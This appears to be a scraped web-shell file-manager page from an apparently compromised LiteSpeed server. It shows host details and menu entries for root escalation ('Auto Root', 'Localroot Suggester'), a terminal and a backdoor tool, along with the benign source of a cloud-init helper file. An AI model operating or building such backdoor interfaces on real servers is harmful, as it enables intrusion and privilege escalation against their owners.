Linux sh52.ich-4.com 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
Server IP : 198.143.147.58 & Your IP : 216.73.217.21
Domains :
Cant Read [ /etc/named.conf ]
User : actualbuzz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.9 /
site-packages /
cloudinit /
cmd /
devel /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-02-03 14:59
__init__.py
899
B
-rw-r--r--
2024-11-25 16:09
hotplug_hook.py
10.86
KB
-rw-r--r--
2024-11-25 16:09
logs.py
13.87
KB
-rw-r--r--
2024-11-25 16:09
make_mime.py
4.09
KB
-rw-r--r--
2024-11-25 16:09
net_convert.py
5.57
KB
-rw-r--r--
2024-11-25 16:09
parser.py
1.35
KB
-rw-r--r--
2024-11-25 16:09
render.py
3.68
KB
-rw-r--r--
2024-11-25 16:09
Save
Rename
# This file is part of cloud-init. See LICENSE file for license information. """Common cloud-init devel command line utility functions.""" from cloudinit.helpers import Paths from cloudinit.stages import Init def read_cfg_paths(fetch_existing_datasource: str = "") -> Paths: """Return a Paths object based on the system configuration on disk. :param fetch_existing_datasource: String one of check or trust. Whether to load the pickled datasource before returning Paths. This is necessary when using instance paths via Paths.get_ipath method which are only known from the instance-id metadata in the detected datasource. :raises: DataSourceNotFoundException when no datasource cache exists. """ init = Init(ds_deps=[]) if fetch_existing_datasource: init.fetch(existing=fetch_existing_datasource) init.read_cfg() return init.paths